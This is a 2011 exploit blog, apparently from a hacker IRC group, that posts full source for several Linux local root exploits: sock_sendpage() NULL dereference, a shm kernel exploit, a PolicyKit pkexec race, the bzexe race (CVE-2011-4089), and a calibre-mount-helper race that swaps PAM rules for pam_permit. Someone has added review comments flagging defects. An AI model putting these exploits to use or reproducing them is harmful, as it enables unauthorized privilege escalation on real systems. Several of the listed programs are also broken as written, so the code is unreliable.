setresgid(0, 0, 0);
printf("[+] Launching root shell!\n");
execl("/bin/sh", "/bin/sh", NULL);
exit(0);
}
printf("[-] Exploit failed!\n");
}

/*
 * Resolve the two kernel functions and fill in the fake kernel objects that
 * trigger() writes over a shmid_kernel.
 *
 * Review notes: both "Symbol table not availabe, aborting!" branches print
 * but do not abort, so the run continues with NULL function pointers;
 * `mode = -1` stores into an unsigned int (all bits set); the key and the
 * caller's uid/gid are copied into the forged permission block, presumably
 * so the forged segment still passes the IPC permission check — confirm
 * against the kernel's ipcperms logic.
 */
void setup(void) {
printf("[+] Looking for symbols ..\n");
commit_creds = (_commit_creds) get_symbol("commit_creds");
if (!commit_creds) {
printf("[-] Symbol table not availabe, aborting!\n");   // does not abort
}
prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
if (!prepare_kernel_cred) {
printf("[-] Symbol table not availabe, aborting!\n");   // does not abort
}
printf("[+] Setting up payload ..\n");
super_block.s_flags = 0;
inode.i_size = 4096;
inode.i_sb = &super_block;
inode.inotify_watches.next = &inode.inotify_watches;   // empty (self-linked) list
inode.inotify_watches.prev = &inode.inotify_watches;
inode.inotify_mutex.count = 1;
dentry.d_count = 4096;
dentry.d_flags = 4096;
dentry.d_parent = NULL;
dentry.d_inode = &inode;
op.mmap = &kernel_code;                // the kernel calls one of these with the fake file
op.get_unmapped_area = &kernel_code;
vfsmount.mnt_flags = 0;
vfsmount.mnt_count = 1;
file.fu_list.prev = &file.fu_list;     // empty (self-linked) list
file.fu_list.next = &file.fu_list;
file.f_dentry = &dentry;
file.f_vfsmnt = &vfsmount;
file.f_op = &op;
shmid_kernel.shm_perm.key = IPC_PRIVATE;
shmid_kernel.shm_perm.uid = getuid();
shmid_kernel.shm_perm.gid = getgid();
shmid_kernel.shm_perm.cuid = getuid();
shmid_kernel.shm_perm.cgid = getgid();
shmid_kernel.shm_perm.mode = -1;       // unsigned field: all permission bits set
shmid_kernel.shm_file = &file;
}

/* Entry point: resolve symbols and build the fake objects, then run the
 * trigger sequence.  Arguments are unused.  Returns 0 only if trigger()
 * returns, i.e. when it printed "Exploit failed!"; on success it execs. */
int main(int argc, char **argv) {
setup();
trigger();
return 0;
}

Yep yep… old but.. hey, there's plenty more like this one… which can work well with planned-out and smart
mmap'ing ;)

xd– #Haxnet/#Haxshells FreeShell service (Yes free)! // Admin

[OLD-UPDATED]: Linux sock_sendpage() NULL pointer deref x86_64/x86/x64/PPC and PPC64 (MMAP redone v2)+READ About using vmap()

Posted on 24th November 2011 in Codes, Exploits

Yea yea.. it is OLD!
Just notice, that playin abit with mmap vals,will get you root still..but,be creative ;) hint is given in-code..
Now the oladass c0de :P (Note the sendfile is done without using mmap/null ;)

FROM SOMEONE WHO WANTED TO KNOW WHY… So I have tried to explain things here, without editing the code, coz that won't do… anyhow, I hope this explains a few things about mmap and vmap to those who do not yet get this sh1t.

I have checked 3 hosts; it does not work for me:
Linux xx.com 2.6.18-274.12.1.el5.centos.plus #1 SMP Tue Nov 29 18:16:47 EST 2011 x86_64 x86_64 x86_64 GNU/Linux
t.c: In function ‘main’:
t.c:147: warning: passing argument 1 of ‘mmap’ makes pointer from integer without a cast

-> failed to mmap: Invalid argument

UPDATE: NOW only updated it because of a non working centos x86_64 ,so lets fix that back ok…this is easy….
We only did mess with PAGE_SIZE of mmap() right?
so first we do this,

// #define PAGE_SIZE getpagesize()  // PAGE_SIZE only need this if the kernel doesnt have header,so maybe // out to

so it wont use the internal mmap,wich, it would not matter anyhow, the exploit should STILL work, but anyhow there is 2 ways to address this last mmap bit…and thats to addin a static figure , some boxes, are mmap(4096,NULL().. ,whilst some, MUST be NULL,so, you might want to try using the NULL version of the exploit…wich can be found on many repos, and it is also disguised as sendpage 2010 or 2010 , i believe, i released that version compiled even, smwhere,working fine, heck, works for me, never really wtached for whatkernels but, i must admit, i had NOT tried this on a centos of late, but, we all know, this type of mmap() bug, well, most boxes block mmap() use ATALL in userland…those who dont will have some grsec or just, preventitive techniques wich make mapping it to NULL almost impossible… heck, if you want to offer another vector for this, like, i have considered to use vmap() wich someone from my channel did do and demonstrated that works,but also we have another mmap size(my bad i forgot this one, and it might actually work for centos) thats simply mmap(4096 * 2,NULL.. , same as rest of it… this is all you could to maybe with mmap,max values i think* but, on vmap, you only have i believe that value and NULL also yes, but, i have yet to try convert anything to use vmap, as it still sits where mmap() is in kernel world…wich is a very tough secure place..but, then again, as i said, i dont think this method, vmap() addr, has been used atall yet…and, could have been,. and, would probably A. not trigger ANYTHING the admins have set to kill any mmap(0 and even B. Bypass the grsec ACL, this is NOT the grsec kernel, the ACL… and maybe C. Bypass,or, just get to map the page, because the kernel sees what is usually, a very normal thing :s…so, yea, hell… good pint out to me in the comment, but, please, learn to use mmap() abit then ask me things like this :S lol..take care.
XD

/*
 *  Linux PF_UNIX or PF_BLUETOOTH sock_sendpage() NULL pointer deref x86_64/x86/x64/PPC and PPC64
 *  ****PF_UNIX socket-vector
 *
 * Exploit was tested on:
 * CentOS 5.7 (2.6.18-274.el5)
 * Red Hat Enterprise Linux 5.7 (2.6.18-274.6.1.el5)
 * SUSE Linux Enterprise Server 11 (2.6.27.19-5)
 * Ubuntu 11.10 (Latest 2011) - Mixed results,depends on the version of kernel.. 2.6.32.6 seems abit better
 *
 * For i386 and PPC i386, compile with the following command:
 * gcc -Wall -o sendpage sendpage.c
 * And for x86_64 and PPC64:
 * gcc -Wall -m64 -o sendpage sendpage.c
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/sendfile.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/utsname.h>
#include <unistd.h>

#define PAGE_SIZE getpagesize()  // PAGE_SIZE only need this if the kernel doesnt have header,so maybe // out to

//#ifndef PF_UNIX
//#define PF_UNIX AF_UNIX
//#define AF_UNIX 11             // Adjust this... some boxes will want this IN
//#endif

#if !defined(__always_inline)
#define __always_inline inline __attribute__((always_inline))
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
/* x86_64: return the current stack pointer (rsp) via inline asm. */
static __always_inline unsigned long current_stack_pointer(void) {
	unsigned long sp;
	asm volatile ("movq %%rsp,%0; " : "=r" (sp));
	return sp;
}
#else
/* i386: return the current stack pointer (esp) via inline asm. */
static __always_inline unsigned long current_stack_pointer(void) {
	unsigned long sp;
	asm volatile ("movl %%esp,%0" : "=r" (sp));
	return sp;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
/* PowerPC (32/64): return the current stack pointer (r1) via inline asm. */
static __always_inline unsigned long current_stack_pointer(void) {
	unsigned long sp;
	asm volatile ("mr %0,%%r1; " : "=r" (sp));
	return sp;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
/* x86_64: read the 8-byte value at %gs:0 and return it as the current
 * task_struct pointer.  Only meaningful in kernel context, where this code
 * is reached via change_cred() from the page-0 trampoline built in main();
 * in user mode %gs:0 means something else entirely. */
static __always_inline unsigned long current_task_struct(void) {
	unsigned long task_struct;
	asm volatile ("movq %%gs:(0),%0; " : "=r" (task_struct));
	return task_struct;
}
#else
/* i386: locate the current task_struct from the kernel stack pointer.  Masks
 * the stack pointer to a 4 KiB boundary and, if the word there is at or
 * above 0xc0000000 (presumably the kernel half of the default 3G/1G split),
 * treats it as the task_struct pointer, accepting it when its own first word
 * is 0; otherwise retries with an 8 KiB mask, first taking the masked
 * address itself, then the word it points to.  Returns -1 when no candidate
 * has a zero first word (the zero is presumably the task state — confirm).
 * Every dereference is of a kernel address: kernel context only. */
static __always_inline unsigned long current_task_struct(void) {
	unsigned long task_struct, thread_info;
	thread_info = current_stack_pointer() & ~(4096 - 1);
	if (*(unsigned long *)thread_info >= 0xc0000000) {
	task_struct = *(unsigned long *)thread_info;
	if (*(unsigned long *)task_struct == 0)
	return task_struct;
	}
	task_struct = current_stack_pointer() & ~(8192 - 1);
	if (*(unsigned long *)task_struct == 0)
	return task_struct;
	thread_info = task_struct;
	task_struct = *(unsigned long *)thread_info;
	if (*(unsigned long *)task_struct == 0)
	return task_struct;
	return -1;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
/* PowerPC: locate the current task_struct from the kernel stack pointer,
 * masked to 16 KiB on 64-bit and 8 KiB on 32-bit.  The masked address is
 * taken first, then the word it points to; either is accepted when its
 * first word is 0 (presumably the task state — confirm), else -1.
 * Kernel context only. */
static __always_inline unsigned long current_task_struct(void) {
	unsigned long task_struct, thread_info;
#if defined(__LP64__)
	task_struct = current_stack_pointer() & ~(16384 - 1);
#else
	task_struct = current_stack_pointer() & ~(8192 - 1);
#endif
	if (*(unsigned long *)task_struct == 0)
	return task_struct;
	thread_info = task_struct;
	task_struct = *(unsigned long *)thread_info;
	if (*(unsigned long *)task_struct == 0)
	return task_struct;
	return -1;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
/* Caller's real uid/gid, captured in main() before the trigger. */
static unsigned long uid, gid;
/* x86: the routine the page-0 trampoline jumps to, i.e. this runs in kernel
 * context.  Walks upward in 4-byte steps from the task_struct returned by
 * current_task_struct() until eight consecutive 32-bit words read
 * uid,uid,uid,uid,gid,gid,gid,gid (presumably the uid/euid/suid/fsuid and
 * gid quartets of the credentials — layout differs per kernel, confirm),
 * zeroes all eight and stops.  Only terminates when the pattern is found or
 * the pointer wraps to NULL.  Always returns -1. */
static int change_cred(void) {
	unsigned int *task_struct;
	task_struct = (unsigned int *)current_task_struct();
	while (task_struct) {
	if (task_struct[0] == uid && task_struct[1] == uid &&
	task_struct[2] == uid && task_struct[3] == uid &&
	task_struct[4] == gid && task_struct[5] == gid &&
	task_struct[6] == gid && task_struct[7] == gid) {
	task_struct[0] = task_struct[1] = task_struct[2] = task_struct[3] =task_struct[4] = task_struct[5] =
	task_struct[6] = task_struct[7] = 0;
	break;
	}
	task_struct++;
	}
	return -1;
}
#elif defined(__powerpc__) || defined(__powerpc64__)
/* PowerPC variant of change_cred(): no uid/gid globals here, so the scan
 * looks for any non-zero word followed by a run where words 0-3 are equal
 * and words 4-7 are equal, then zeroes all eight.  Runs in kernel context,
 * terminates only on a match or pointer wrap, always returns -1. */
static int change_cred(void) {
	unsigned int *task_struct;
	task_struct = (unsigned int *)current_task_struct();
	while (task_struct) {
	if (!task_struct[0]) {
	task_struct++;
	continue;
	}
	if(task_struct[0]==task_struct[1]&&task_struct[0]==task_struct[2]&&
	task_struct[0]==task_struct[3]&&task_struct[4]==task_struct[5]&&
	task_struct[4]==task_struct[6]&&task_struct[4]==task_struct[7]) {
        task_struct[0]=task_struct[1]=task_struct[2]=task_struct[3]=task_struct[4]=
        task_struct[5]=task_struct[6]=task_struct[7]=0;
	break;
	}
	task_struct++;
	}
	return -1;
}
#endif

/*
 * Entry point.  Intended sequence: map a page at the lowest address, write
 * a small trampoline there that jumps to change_cred(), make the kernel
 * call a NULL function pointer via sendfile() on a PF_UNIX datagram socket
 * (the sock_sendpage() bug named in the header), then exec a shell.
 *
 * Review notes (as the code stands):
 *   - mmap() is called as mmap(PAGE_SIZE, NULL, ...): the first argument
 *     (the address) is PAGE_SIZE, which is the "makes pointer from integer"
 *     warning quoted in the post, and the length argument is NULL, i.e. 0,
 *     which mmap() rejects with EINVAL — the "Invalid argument" the post
 *     reports.  Independently of the arguments, vm.mmap_min_addr (mentioned
 *     in the post) is the standard control against mapping the zero page.
 *   - The mkstemp() template "/tmp/fdlist.SUX" does not end in six 'X'
 *     characters, so mkstemp() fails with EINVAL on conforming libcs and
 *     the program exits at the "-> mkstemp" perror.
 *   - On x86 the bytes appear to be an absolute indirect jump through the
 *     pointer stored at addr+8 (ff 24 25 / ff 25 …) — confirm; the PPC32
 *     bytes look like a lis/ori/mtctr/bctr sequence loading change_cred;
 *     the PPC64 line copies the first word at change_cred (presumably its
 *     ELFv1 function descriptor entry).
 *   - sendfile()'s return is unchecked and the shell is exec'd whether or
 *     not anything happened.
 */
int main(void) {
	char *addr;
	int out_fd, in_fd;
	char template[] = "/tmp/fdlist.SUX";   // mkstemp() needs a trailing "XXXXXX"
#if defined(__i386__) || defined(__x86_64__)
	uid = getuid(), gid = getgid();   // pattern change_cred() scans for
#endif
        if((addr=mmap(PAGE_SIZE,NULL,PROT_READ|PROT_WRITE,MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS,0,0))==MAP_FAILED){   // address=PAGE_SIZE, length=0
	perror("-> failed to mmap");
	exit(EXIT_FAILURE);
	}
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
	addr[0] = '\xff';   // trampoline bytes; the pointer at addr+8 is the target
	addr[1] = '\x24';
	addr[2] = '\x25';
	*(unsigned long *)&addr[3] = 8;
	*(unsigned long *)&addr[8] = (unsigned long)change_cred;
#else
	addr[0] = '\xff';
	addr[1] = '\x25';
	*(unsigned long *)&addr[2] = 8;
	*(unsigned long *)&addr[8] = (unsigned long)change_cred;
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#if defined(__LP64__)
	*(unsigned long *)&addr[0] = *(unsigned long *)change_cred;   // first word at the function symbol
#else
	addr[0] = '\x3f';   // upper half of the change_cred address
	addr[1] = '\xe0';
	*(unsigned short *)&addr[2] = (unsigned short)change_cred>>16;
	addr[4] = '\x63';   // lower half
	addr[5] = '\xff';
	*(unsigned short *)&addr[6] = (unsigned short)change_cred;
	addr[8] = '\x7f';
	addr[9] = '\xe9';
	addr[10] = '\x03';
	addr[11] = '\xa6';
	addr[12] = '\x4e';
	addr[13] = '\x80';
	addr[14] = '\x04';
	addr[15] = '\x20';
#endif
#endif
	if ((out_fd = socket(PF_UNIX, SOCK_DGRAM, 0)) == -1) {
	perror("-> socket");
	exit(EXIT_FAILURE);
	}
	if ((in_fd = mkstemp(template)) == -1) {   // fails: template has no "XXXXXX" suffix
	perror("-> mkstemp");
	exit(EXIT_FAILURE);
	}
	if(unlink(template) == -1) {
	perror("-> unlink");
	exit(EXIT_FAILURE);
	}
	if (ftruncate(in_fd, PAGE_SIZE) == -1) {
	perror("-> ftruncate");
	exit(EXIT_FAILURE);
	}
	sendfile(out_fd, in_fd, NULL, PAGE_SIZE);   // result unchecked
	execl("/bin/sh", "/bin/sh", "-i", NULL);    // runs regardless of the outcome
	exit(EXIT_SUCCESS);
}

Yea yea, it is modified a little to gain a root shell 100% WITHOUT using PER_SVR/mmap_min_addr, although that would
do for PPC and PPC64; payloads are done accordingly, compile it RIGHT!
xd– / #HaxNET && #HaxSHELLS !

NEED A **GOOD** VPS :
http://www.vr.org/aff.php?aff=551 – VPS 5bux ,then 10bux monthly
Gives ya IPv6 \64 and native + allows Tunnelbroker to, for having 3 tunnels IPV6,IPV4 and all BW is GENEROUS!

Please use the reflink,it WILL make YOUR stuff cheaper,you will see why when i show you ;)
If your an aff,but there is already atleast ONE who uses it and,LOVES it like me who now have 2 boxes thru
one panel,running one UK and one AMS/NL !
Lovin it!

WARGAMES ~ Hack – Challenges + Some infos – LinkTos !

Posted on 22nd November 2011 in Papers

WARGAMES
———–

No.1 http://www.smashthestack.org
-> Used A LOT, well known, and owner l3th4l is a good dev on this stuff; he USED to idle in my irc channel,
unfortunately I have not seen him around lately… (I have passed many of the levels.. and completed his wargame..)
I can only give you some tips, but no walkthroughs, as I have promised not to… also, consult tropic for this also.
(Team STS) members are also freely hangin in #Haxnet.. feel free to talk STS anytime!

No.2 Binary CELL – binarycell.org [Not used by me yet]
-> Unknown but looks ok!

No.3 Intruded.net – www.intruded.net
-> Used A LOT; it also helped me learn a lot about the kernel and simple flaws which allow bypasses.. updated, and that's
probably its BEST point.. it also has an irc.intruded.net, and I guess maybe some help/faqs there..
Great place when it is up! Good games, very fun, I played a lot on there, and yes again completed most of
this, not all tho..

No.4 https://www.wechall.net
-> From the owner …
https://www.wechall.net
is “my” site :)
acutally i referr to it as “our” site … but i am sysadmin + dev :)
it is about “hacking challenge sites” + has own challenges
a few days ago we have released a new challenge:
https://www.wechall.net/challenge/blind_lighter/index.php
it is about blind sql injection, where you have to get 32 char md5 with only 32 blind queries
sorry for the “advertisement” ..for myself i am not into “hacking” i am more a hobby coder PHP mostly
but i am interested in security too. Every good coder should have security in mind
so, hello there, now you know me a bit :)
the nice thing on wechall is that it is open source code (except some secret challenge bits)
i plan to release my web-framework on an MIT/BSD compatible license … but i think we still have a long road to go

Thats straight from the authors mouth :) And, welcome to the world of coding, fun and smashing the stack!
This will be updated as more good wargames are found.. walkthroughs and private messages regarding ANY games mentioned would be welcomed too… enjoy!

xd– / #HaxNET / Admin HaxSHELLS/VPS / Admin CrazyCoders.com .. crazycoders.US / ABN Melrose PC Suppt

PolicyKit Pwnage PROPER root exploit based on zx2c4 code, very nice working version made by Admin

Posted on 10th November 2011 in Codes, Exploits

Enjoy, but I advise to simply use the C binary if you have it compiled.. or just modify this a little to suit your needs… this works on Ubuntu 10.04.4 (latest stable anyhow)… on the 3.0.4 kernel. It is NOT 0day at all, but with so many fakes around, I guess I decided to close this one; the next I will do is bzip2, or rather, I have DONE it but I might hang on to it.. as, if you look into that src, it goes VERYYYYY far… (Almost every distro affected!!)…
Anyhow this is polkit.sh :

#!/bin/sh
## policykit-pwnage.c -> to -> bash version -> polkit.sh by xd-- / #HaxNET@EFNet
# Review notes (defects visible in this script, left as-is):
#  - su.c below defines only a constructor and no main(), so `gcc -o su su.c`
#    fails at link time; its argv[0] "/bin/sh -c " is one string with a
#    trailing space, which is not an existing path for execve() either.
#  - makesu.c never reads argv, so the "chown"/"chmod" words passed to
#    ./makesu below are ignored; every run does the same chsh/pkexec dance.
#  - Everything is written under /media/ and the final lines would leave a
#    setuid binary there if the chain ever succeeded.
#  - The technique races pkexec's check of its subject process against that
#    process exec'ing a setuid program (the inotify IN_ACCESS watch on
#    /proc/<pid> is the trigger); the post itself notes this is not 0day,
#    i.e. a patched PolicyKit is the fix.
cd /media/
# su.c: a constructor that runs when the binary is loaded, before any main().
cat > su.c << EOF
#include <unistd.h>
#include <stdio.h>
#include <fcntl.h>

void __attribute__((constructor)) init() {
char *a[] = {"/bin/sh -c ", NULL};
setuid(0);
setgid(0);
execve(*a, a, NULL);
}
EOF
# makesu.c: the parent closes its stdio, waits for the first access to its
# own /proc/<pid> entry, then execs chsh; the child sleeps 2 s and runs
# pkexec /bin/sh.  argv is never examined.
cat > makesu.c << _EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/inotify.h>

int main(int argc, char **argv) {
if (fork() != 0) {
int fd;
char pid_path[1025];
sprintf(pid_path, "/proc/%i", getpid());
close(0);
close(1);
close(2);
fd = inotify_init();
inotify_add_watch(fd, pid_path, IN_ACCESS);
read(fd, NULL, 0);
execl("/usr/bin/chsh", "chsh", NULL);
} else {
sleep(2);
execl("/usr/bin/pkexec", "pkexec", "/bin/sh", NULL);
}
return 0;
}
_EOF
gcc -o su su.c         # fails to link: su.c has no main()
gcc -o makesu makesu.c
./makesu chown root:root su   # arguments are ignored by makesu (see above)
./makesu chmod u+s su
echo "-> Your suid shell is on /media/su make sure ya move this!"
/media/./su -c /bin/sh
/media/su -c /bin/sh
su
whoami

Thats all for now.. i doubt ill publish the bzip :P ~~
laterz.
xd–

Bzip2 local root exploit code (.c) (CVE-2011-4089)

Posted on 6th November 2011 in Exploits

CVE-2011-4089
Thanks to bugs,vladz,GeorgeG,Michael Z,loophole/lh,Benjamin Renaut and anyone else involved in this, note that this race will work and give you root on debian-ubuntu and centos so far… so it is a matter of bzip2 / bzexe being run, and the same method as before, just refined by vladz, thx and props.

To use this one, you could add code to make a file thru dd then compress it, or even check which binary exists, but to date this is the better, more refined exploit code for this race condition.
Note also, it is patched and, i would hope people run updates on Ubuntu atleast.

Original post: http://vladz.devzero.fr/other/bzexe_PoC.c.html

Update:
Tested on: Ubuntu 10.04.3 SMP up to date binary
Tested on: CentOS 5.0/5.5 (bzip2) upto date
Tested on: RHEL4/5/6 (bzip2 version 1.0.5-6)
Tested on: Debian 6.0.3 up to date (bzip2 version 1.0.5-6)

** I did have to change this from cc to gcc , so possibly you should check your bsd binaries ??? hehe…

/*
   bzexec_PoC.c -- bzip2 (bzexe) race condition PoC (CVE-2011-4089)

   Author:    vladz (http://vladz.devzero.fr)
   Tested on: Debian 6.0.3 up to date (bzip2 version 1.0.5-6)

   This PoC exploits a race condition in the bzexe script.  This tool is
   rarely used so I wasn't supposed to write an exploit.  But some people
   on the full-disclosure list had doubts about this exploitation.  Public
   discussion about this issue started from this post:  

http://seclists.org/fulldisclosure/2011/Oct/776

   I am using Inotify to win the race (on my dual-core, it succeeds 100%).

      Usage: ./bzexe_PoC <command_name>

   For instance, if "/bin/dd" has already been compressed with bzexe,
   launch:

      $ ./bzexe_PoC dd
      [*] launching attack against "dd"
      [+] creating evil script (/tmp/evil)
      [+] creating target directory (/tmp/dd)
      [+] initialize inotify
      [+] waiting for root to launch "dd"
      [+] opening root shell
      # whoami
      root
*/
#define _GNU_SOURCE
#include <sys/inotify.h>
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <string.h>
#include <fcntl.h>

/*
 * Write the payload script to `file`.
 *
 * The script is what the bzexe-wrapped command will run on the attacker's
 * behalf (see the header comment above): it compiles a small program that
 * calls setuid(0) and execs /bin/sh, installs it as a setuid-root /tmp/sh,
 * deletes itself (rm -f ${0}) and finally runs the basename of the invoked
 * name with the original arguments so the caller sees the command it asked
 * for.
 *
 * Review notes: open() and write() results are not checked; the file is
 * created with mode 0777 and without O_EXCL, so a pre-existing file at
 * `file` is silently reused/overwritten.  Always returns 0.
 */
int create_nasty_shell(char *file) {
  char *s = "#!/bin/bash\n"
            "echo 'main(){setuid(0);execve(\"/bin/sh\",0,0);}'>/tmp/sh.c\n"
            "gcc /tmp/sh.c -o /tmp/sh; chown root:root /tmp/sh\n"          // edited here the cc skiddiescrew
            "chmod 4755 /tmp/sh; rm -f ${0}; ${0##*/} $@\n";

  int fd = open(file, O_CREAT|O_RDWR, S_IRWXU|S_IRWXG|S_IRWXO);  /* unchecked */
  write(fd, s, strlen(s));                                      /* unchecked */
  close(fd);
  return 0;
}

/*
 * Entry point of the bzexe race PoC (CVE-2011-4089).
 *
 * argv[1] is the name of a command that has been wrapped by bzexe.  The PoC
 * creates a world-writable /tmp/<name> directory, blocks on an IN_CREATE
 * inotify watch until the wrapper creates something inside it, then renames
 * the directory away and moves the payload written by create_nasty_shell()
 * to that same path, so the privileged wrapper picks up the payload instead
 * of its own temporary file.  After a short sleep it runs /tmp/sh, which the
 * payload is expected to have left setuid-root.
 *
 * Review notes:
 *  - malloc(sizeof(argv[1]) + 6): sizeof(char *) is the pointer size, not
 *    the string length, so on a 64-bit build the buffer is 14 bytes and any
 *    name longer than 8 characters overflows it in sprintf().  malloc() is
 *    also unchecked.
 *  - mkdir(), inotify_init(), inotify_add_watch() and system() results are
 *    ignored.
 *  - The 1-byte read on the inotify fd is smaller than any inotify_event;
 *    on Linux it blocks until an event is queued and then fails, so it only
 *    acts as a wake-up.
 *  - Paths touched: /tmp/evil, /tmp/<name>, /tmp/trash, /tmp/sh.c, /tmp/sh.
 *    Their appearance, and a world-writable /tmp/<name> directory, are the
 *    observable traces of an attempt.
 * Returns 1 on usage error, otherwise 0 regardless of outcome.
 */
int main(int argc, char **argv) {
  int fd, wd;
  char buf[1], *targetpath,*evilsh = "/tmp/evil", *trash = "/tmp/trash";
  if (argc < 2) {
    printf("usage: %s <cmd name>\n", argv[0]);
    return 1;
  }
  printf("[*] launching attack against \"%s\"\n", argv[1]);
  printf("[+] creating evil script (/tmp/evil)\n");
  create_nasty_shell(evilsh);
  /* BUG: sizeof(argv[1]) == sizeof(char *), not strlen(argv[1]); see above. */
  targetpath = malloc(sizeof(argv[1]) + 6);
  sprintf(targetpath, "/tmp/%s", argv[1]);
  printf("[+] creating target directory (%s)\n", targetpath);
  mkdir(targetpath, S_IRWXU|S_IRWXG|S_IRWXO);
  printf("[+] initialize inotify\n");
  fd = inotify_init();
  wd = inotify_add_watch(fd, targetpath, IN_CREATE);
  printf("[+] waiting for root to launch \"%s\"\n", argv[1]);
  /* Blocking wait only; a 1-byte buffer cannot hold an event. */
  syscall(SYS_read, fd, buf, 1);
  /* Swap: directory -> /tmp/trash, payload -> /tmp/<name>. */
  syscall(SYS_rename, targetpath,  trash);
  syscall(SYS_rename, evilsh, targetpath);
  inotify_rm_watch(fd, wd);
  printf("[+] opening root shell (/tmp/sh)\n");
  sleep(2);
  /* Runs whatever is at /tmp/sh; the payload is expected to have put it there. */
  system("rm -fr /tmp/trash;/tmp/sh || echo \"[-] Failed.\"");
  return 0;
}

cheers
xd– / #haxnet@EF

Calibre E-Book Reader local root exploitz

Posted on 3rd November 2011 in Exploits

Here we have *4* different exploits, similar in their nature…
Theyre ALL nice but by far the nicest was pointed out to me by the author himself, and he would be definately in running for craziest coder of 2011 if he keeps it up :> zx2c4 i refer to, who promptly reminded me he had basically made a REALLY nice version and thus showed me to it, i was glad because I dont use pub disclosure policys usually and was happy to be able to update this post so here it is, the best by FAR (i thought v1 was nice..) but this one, is extremely nice code, and actually abit of this code would probably goto finishing the bzip2 project, well, ideally speaking.. in an ideal world..

here it is the

80. (E)-Calibre reader local root exploit (Race condition)
Love these exploits but theyre really tricky so BIG props to the author zx2c4 :D

/*
 * ########################################################
 * #               .80 Calibrer Assault Mount             #
 * #                         by zx2c4                     #
 * ########################################################
 *
 * Yesterday's assult mount used inotify to mount into /etc/pam.d. Today we
 * expand the attack by adding a race toggler so we can mount from non-block
 * devices.
 *
 * Enjoy.
 *
 * - zx2c4
 * 2011-11-4
 *
 * greets to djrbliss
 *
 */
#include <stdio.h>
#include <sys/inotify.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>

/*
 * Entry point of the ".80" calibre-mount-helper PoC.
 *
 * Outline (all steps via system()/fork(), nothing is error-checked):
 *  1. Remove leftovers and build a 25600-block NTFS image at
 *     /dev/shm/overlay.
 *  2. Mount that image on /media/staging/ through the setuid helper while a
 *     child process ("race condition toggler") keeps replacing
 *     /dev/shm/overlay with a symlink to /dev/ram0 and back.  Presumably the
 *     helper's device check and the actual mount see different objects --
 *     the helper's source is not on this page, so this is inferred from the
 *     .70 header below ("subvert recent changes preventing symlinks and
 *     checking path prefixes").
 *  3. Copy /etc/pam.d into the staging mount and rewrite pam_deny /
 *     pam_cracklib / pam_unix entries to pam_permit.
 *  4. Mount the overlay over /etc/pam.d, again with the toggler plus a second
 *     child that flips /media/staging/fake between a directory and a symlink
 *     to /etc/pam.d as soon as something is created inside it (inotify).
 *  5. Run "su"; with pam_permit in place any password is expected to work.
 *
 * Review notes:
 *  - 256 and 8192 are wait-status encodings as returned by system()
 *    (exit status 1 and 32 in the high byte); the loops retry on those.
 *  - <sys/stat.h> is not included, so mkdir() is implicitly declared and is
 *    called with one argument; the mode the kernel receives is unspecified.
 *  - read(fd, 0, 0) is a zero-length read used only as a blocking wait.
 *  - The toggler children loop forever and are SIGKILLed by the parent; the
 *    "return 0" after each while(1) is unreachable.
 *  - Artefacts: /dev/shm/overlay, /media/staging/ and the mount on
 *    /etc/pam.d remain until cleaned up; a non-root user invoking
 *    calibre-mount-helper with /dev/shm or /etc paths is the observable
 *    signal.
 */
int main(int argc, char **argv)
{
	printf("########################################################\n");
	printf("#               .80 Calibrer Assault Mount             #\n");
	printf("#                         by zx2c4                     #\n");
 	printf("########################################################\n\n");

	printf("[+] Cleaning up old cruft.\n");
	unlink("/dev/shm/overlay");
	system("calibre-mount-helper cleanup /dev/ram0 /media/staging/");

	printf("[+] Creating overlay container.\n");
	system("dd if=/dev/zero of=/dev/shm/overlay count=25600");
	system("/usr/sbin/mkfs.ntfs /dev/shm/overlay");

	printf("[+] Mounting staging using race condition toggler...\n");
	int childpid = fork();
	if (childpid) {
	int ret;
	/* Parent: retry the helper while it fails with wait status 256/8192. */
	while ((ret = system("calibre-mount-helper mount /dev/shm/overlay /media/staging/ 2>&1")) == 256 || ret == 8192);
		kill(childpid, SIGKILL);
	} else {
		/* Child: toggle overlay file <-> symlink to /dev/ram0 until killed. */
		while (1) {
			rename("/dev/shm/overlay", "/dev/shm/overlay-holder");
			symlink("/dev/ram0", "/dev/shm/overlay");
			unlink("/dev/shm/overlay");
			rename("/dev/shm/overlay-holder", "/dev/shm/overlay");
		}
		return 0;	/* unreachable */
	}

	printf("[+] Preparing overlay with /etc/pam.d modification:\n");
	system("cp -v /etc/pam.d/* /media/staging/");
	system("sed -i \"s/pam_deny.so/pam_permit.so/g\" /media/staging/common-auth");
	system("sed -i \"s/pam_cracklib.so.*/pam_permit.so/g\" /media/staging/system-auth");
	system("sed -i \"s/pam_unix.so.*/pam_permit.so/g\" /media/staging/system-auth");

	printf("[+] Mounting overlay over /etc/pam.d using race condition toggler and inotify...\n");
	childpid = fork();
	if (childpid) {
	int childpid2 = fork();
	if (childpid2) {
	int ret;
	/* Parent: same retry loop, now targeting /etc/pam.d/. */
	while ((ret = system("calibre-mount-helper mount /dev/shm/overlay /etc/pam.d/ 2>&1")) == 256 || ret == 8192);
	kill(childpid, SIGKILL);
	kill(childpid2, SIGKILL);
	} else {
			/* Second child: wait for a create inside "fake", then swap it
			 * for a symlink to /etc/pam.d. mkdir() is implicitly declared
			 * here (no <sys/stat.h>), so its mode argument is unspecified. */
			while (1) {
				int fd;
				fd = inotify_init();
				unlink("/media/staging/fake");
				mkdir("/media/staging/fake");
				inotify_add_watch(fd, "/media/staging/fake", IN_CREATE);
				read(fd, 0, 0);	/* blocking wait only */
				rename("/media/staging/fake", "/media/staging/tmp");
				symlink("/etc/pam.d", "/media/staging/fake");
